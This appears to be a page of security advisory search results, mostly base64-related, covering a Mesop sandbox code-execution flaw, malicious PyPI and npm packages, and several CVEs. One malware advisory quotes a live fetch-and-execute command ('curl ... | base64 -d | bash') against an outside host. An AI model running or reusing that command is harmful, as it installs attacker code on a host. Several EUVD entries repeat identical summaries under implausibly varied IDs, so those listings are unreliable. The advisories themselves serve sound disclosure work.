Mesop AI Sandbox <= 1.2.2 - Remote Code Execution

Mesop = 1.2.2 contains an unrestricted remote code execution caused by unauthenticated ingestion and execution of base64-encoded Python code in the /exec-py endpoint of ai/testing module, letting attackers execute arbitrary commands on the host, exploit requires HTTP access to the server. id:...

MAL-2026-4812 Malicious code in m-at-star-tools (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...

Malicious code in midcorp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bc6725ed066ed5aff9452bd82d278fd89c1548768124d8b89cb8e5a5e8c3b05a The package masquerades as a pino-compatible logger package.json keywords fast/logger/stream/json, exports module.exports.pino = middleware, lib...

CVE-2019-25470 eWON Firmware 12.2-13.0 Authentication Bypass via wsdReadForm

eWON Firmware versions 12.2 to 13.0 contain an authentication bypass vulnerability that allows attackers with minimal privileges to retrieve sensitive user data by exploiting the wsdReadForm endpoint. Attackers can send POST requests to /wrcgi.bin/wsdReadForm with base64-encoded partial credentia...

CVE-2025-15514

CVE-2025-15514 affects Ollama 0.11.5-rc0 through 0.13.5, with a null pointer dereference in multi‑modal image processing. Malformed base64 image data passed to /api/chat can cause mtmd_helper_bitmap_init_from_buf to return NULL and be dereferenced, triggering a segmentation fault and DoS. Mitigat...

CVE-2018-18753

Typecho V1.1 allows remote attackers to send shell commands via base64-encoded serialized data, as demonstrated by SSRF...

MAL-2025-191946 Malicious code in gtkfuscator (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: oracle-using-macaron 83b5a97c937ac16481e2ad27346069180a0a823c5f6b361cc4e7f08e97716c24 This package decompresses and executes a base64-encoded malicious payload...

EUVD-2008-5837

Malware in sbrugna...

EUVD-2010-1346

Malware in sbrugna...

EUVD-2005-0219

Malware in sbrugna...

EUVD-2017-15950

Malware in sbrugna...

EUVD-2025-19671

Malicious code in bioql PyPI...

EUVD-2022-29730

Malicious code in bioql PyPI...

EUVD-2022-2540

Malicious code in bioql PyPI...

EUVD-2023-33533

Malicious code in bioql PyPI...

EUVD-2025-19856

Malicious code in bioql PyPI...

EUVD-2024-1897

Malicious code in bioql PyPI...

CVE-2013-10070

PHP-Charts v1.0 contains a PHP code execution vulnerability in wizard/url.php, where user-supplied GET parameter names are passed directly to eval without sanitization. A remote attacker can exploit this flaw by crafting a request that injects arbitrary PHP code, resulting in command execution...

CVE-2025-5731

A flaw was found in Infinispan CLI. A sensitive password, decoded from a Base64-encoded Kubernetes secret, is processed in plaintext and included in a command string that may expose the data in an error message when a command is not found...

CVE-2025-5731

Summary: CVE-2025-5731 affects the Infinispan CLI, where a credential decoded from a Kubernetes secret is handled in plaintext and can appear in a command string, potentially leaking data in an error message when a command is not found. Root cause: insecure processing/embedding of the decoded sec...